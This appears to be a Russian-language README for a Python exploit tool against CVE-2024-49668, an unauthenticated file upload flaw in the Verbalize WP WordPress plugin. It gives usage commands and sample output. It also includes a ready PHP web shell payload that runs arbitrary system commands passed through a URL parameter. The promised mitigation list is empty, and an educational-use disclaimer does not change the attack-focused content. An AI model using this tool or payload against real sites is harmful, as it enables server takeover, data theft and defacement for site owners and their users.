
WordPress плагин Verbalize WP <= 1.0 - уязвимость произвольной загрузки файлов
CVE-2024-49668 — критическая уязвимость в плагине Verbalize WP для WordPress версии 1.0 и ниже. Эта уязвимость позволяет неавторизованным злоумышленникам загружать произвольные файлы, включая веб-шеллы, на веб-сервер. Проблема возникает из-за недостаточной проверки входных данных и ограничений на типы файлов при загрузке.
Этот скрипт на Python использует уязвимость CVE-2024-49668 для загрузки файла-оболочки на целевой сайт WordPress через плагин Verbalize WP.
readme.txt.requestsУстановите требуемую библиотеку с помощью pip:
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
Execute a POST request to a WordPress site.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-s, --shell SHELL Shell code to upload
По умолчанию скрипт загружает PHP-оболочку, которая выполняет phpinfo().
python CVE-2024-49668.py -u http://target.com
Вы также можете указать собственный PHP-код оболочки для загрузки:
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi
Уязвимость CVE-2024-49668 позволяет злоумышленникам получить полный контроль над целевым сервером путём загрузки вредоносных файлов. Эксплуатация этой уязвимости может привести к серьёзным последствиям, включая утечку данных, несанкционированный доступ и возможную порчу веб-сайта.
Для защиты вашего сайта WordPress от этой уязвимости рекомендуется:
Данный инструмент предназначен исключительно для образовательных целей. Несанкционированное использование этого инструмента против веб-сайтов без явного разрешения владельца является незаконным. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.
Создано 2025-03-22 Nxploited , Khaled alenazi